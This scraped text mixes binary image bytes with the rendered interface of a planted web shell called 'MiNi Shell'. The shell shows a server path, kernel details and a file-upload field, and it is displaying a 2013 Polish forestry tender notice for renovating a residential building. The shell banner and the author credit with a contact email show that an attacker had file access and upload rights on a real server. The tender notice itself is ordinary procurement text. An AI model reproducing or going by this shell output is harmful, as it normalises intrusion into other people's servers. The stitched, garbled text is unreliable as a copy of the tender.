JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130531/95915-N-2013.html

<p class="kh_header"><b>Gostynin: Remont budynku mieszkalnego osady Szczawin</b><br>
<b>Numer ogłoszenia: 95915 - 2013; data zamieszczenia: 31.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Gostynin , ul. Bierzewicka 55, 09-500 Gostynin, woj. mazowieckie, tel. 24 2353056, faks 24 235 30 57.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lasy.gov.pl/pl/bip/dg/rdlp_lodz/nadl_gostynin/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka administracyjna PGL Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku mieszkalnego osady Szczawin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie prac budowlanych w skład których wchodzą:
- wymiana pokrycia dachowego z eternitu na blachodachówkę,
- wymiana kompletna rynien i obróbek blacharskich,
- docieplenie stropu warstwą wełny mineralnej 10 cm (poprawienie warstw istniejącej wełny
   i uzupełnienie zniszczonej i brakującej),
- montaż płotków przeciwśniegowych, włazów na dach (z drabinką do wyjścia), ław kominowych, 
   stopni dachowych i instalacji odgromowej (od istniejących złącz do blachy pokrycia dachowego),
- naprawa kominów (tynki i czapy) i obłożenie blachą powlekaną,
- skucie tynków na ścianach tarasów, ułożenie styropianu 3 cm jako izolacji pionowej i wykonanie 
   nowych tynków cienkowarstwowych (zaciągnięcie zaprawą klejową),
- wymiana okien w części na parterze i okien na poddaszu od strony zachodniej i wschodniej
- wymiana drzwi zewnętrznych wejściowych (z naświetlem górnym) do budynku - stalowe ocieplone, 
   balkonowych - z PCV oraz do kotłowni - stalowych ocieplonych,
- wymiana płytek ceramicznych na tarasach, schodach zewnętrznych i podestach wejściowych do 
   budynku z wykonaniem cokolików,
- wymiana balustrad drewnianych ze skróceniem słupów drewnianych podpierających konstrukcję 
  daszków nad wejściem,
- malowanie farbą emulsyjną całej elewacji budynku ze ścianami tarasów,

   Roboty wewnątrz budynku:
   
W lokalu zajmowanym przez leśniczego:
- wykucie otworu i osadzenie drzwi o szer. 80 cm z przedpokoju do kotłowni,
- wykonanie stalowych schodów do kotłowni,
- wymiana pieca olejowego na paliwo stałe,
- wymiana drzwi do łazienki na parterze i skrzydła drzwiowego z wiatrołapu do przedpokoju
- wymiana płytek ceramicznych w łazience na parterze,
- ułożenie wykładziny PCV w kuchni, przedpokoju i w kancelarii na parterze (po uprzednim pokryciu 
   podłogi płytą OSB o grub. 8mm
- pokrycie podłogi w salonie na parterze panelami podłogowymi na płycie OSB j.w.,
- wykonanie w łazience na poddaszu wentylacji i odpowietrzenia kanalizacji do komina oraz wymiana 
   płytek ceramicznych i wymiana wyposażenia łazienek na nowe,
- montaż dodatkowego legara pod deski podłogowe w hallu na poddaszu,
- wymiana wyłazu z poddasza na strych,
- montaż wkładu kominowego w kanale dymowym do pieca c.o.

W lokalu zajmowanym przez podleśniczego:
- wymiana sedesu i umywalki w łazience na parterze.
45262600-7.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.26.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 3 000 PLN (słownie: trzy
tysiące złotych, zero groszy) w terminie do dnia 20.06.2013r. Wadium może być 
         wniesione w jednej lub kilku następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
12.2  Wadium w formie pieniężnej należy wnieść przelewem z rachunku Wykonawcy na 
         rachunek bankowy zamawiającego: Bank PEKAO S.A. I o. Gostynin, nr 87 1240 3187 
         1111 0000 3141 0508  z dopiskiem na blankiecie przelewu, jakiego numeru 
         postępowania dotyczy. Kserokopię dowodu przelewu potwierdzoną za zgodność 
         z oryginałem należy dołączyć do oferty.  
12.3  Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej lub 
         spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji ubezpieczeniowej,
         poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy 
         załączyć w formie oryginału do oferty.
12.4	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli przed upływem podanego terminu składania ofert najpóźniej w dniu 19.06.2013r będzie się znajdować na rachunku bankowym Zamawiającego.
12.5  Wykonawca, który nie wniesie wadium lub jego oferta nie zostanie złożona z właściwą 
          formą wadium zostanie wykluczony a jego oferta uznana za odrzuconą na podstawie 
          art. 24 ust.2 pkt.2 ustawy Pzp.
12.6  Wadium wniesione w pieniądzu, zamawiający przechowa na rachunku bankowym 
          i zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, 
          pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za 
          przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. Dyspozycję w 
          zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców, zamawiający 
          przekaże do banku niezwłocznie po:
	- wyborze najkorzystniejszej oferty, wszystkim wykonawcom z wyjątkiem
              wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
- zawarciu umowy w sprawie zamówienia publicznego i wniesieniu zabezpieczenia 
  należytego wykonania umowy, Wykonawcy, którego oferta została wybrana jako
  najkorzystniejsza,
- unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego.
12.7  Zamawiający niezwłocznie dokona zwrotu wadium na wniosek wykonawcy:
     	- który wycofał ofertę przed upływem terminu składania ofert.
12.8 Wadium wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz
         z odsetkami w przypadku, gdy wykonawca:
- odmówi podpisania umowy na warunkach określonych w ofercie,
- zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy,
- jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie
  złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub
  pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego 
  stronie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał co najmniej 3 (trzy) roboty z zakresu branży budowlanej o łącznej wartości minimum 500 000,00 zł, netto,
Wykonawca zobowiązany jest do przedstawienia poświadczeń lub innych dokumentów (np. referencji) potwierdzających, że wykazane roboty, o których mowa powyżej, zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca - w zakresie osób zdolnych do wykonania zamówienia - wykaże się dysponowaniem :
a)  przynajmniej jedną osobą posiadającą uprawnienia do kierowania robotami w zakresie konstrukcyjno-budowlanym, (osoba ta będzie pełnić funkcję kierownika budowy z ramienia wykonawcy) a także, która jest wpisana do centralnego rejestru osób posiadających uprawnienia budowlane potwierdzonego przez Głównego Inspektora Nadzoru Budowlanego. Wpis  do centralnego rejestru dotyczy jedynie osób, które uzyskały uprawnienia budowlane po 01.01.1995 roku. 
b)  przynajmniej 5 (pięcioma osobami) z minimum dwuletnim doświadczeniem w zakresie wykonywania prac budowlanych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże że: 
 - posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie    
   prowadzonej działalności gospodarczej na cały okres związania ofertą i na 
   sumę ubezpieczenia w kwocie minimum 150 000,00 zł (sytuacja 
   ekonomiczna), 
- dysponuje środkami finansowymi lub zdolnością kredytową (sytuacja 
   finansowa) w kwocie nie mniejszej niż wysokość oferowanej ceny (brutto) za 
   wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa może ulec zmianie w przypadku zaistnienia okoliczności niezależnych po 
stronie Zamawiającego oraz, których nie można było przewidzieć.
2. Zawarty w umowie termin wykonania może ulec zmianie przy zaistnieniu warunków, o których mowa w pkt. 7 SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lasy.gov.pl/pl/bip/dg/rdlp_lodz/nadl_gostynin/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 09-500 Gostynin, ul. Bierzewicka 55.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2013 godzina 08:30, miejsce: Sekretariat biura Zamawiającego 09-500 Gostynin, ul. Bierzewicka 55.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com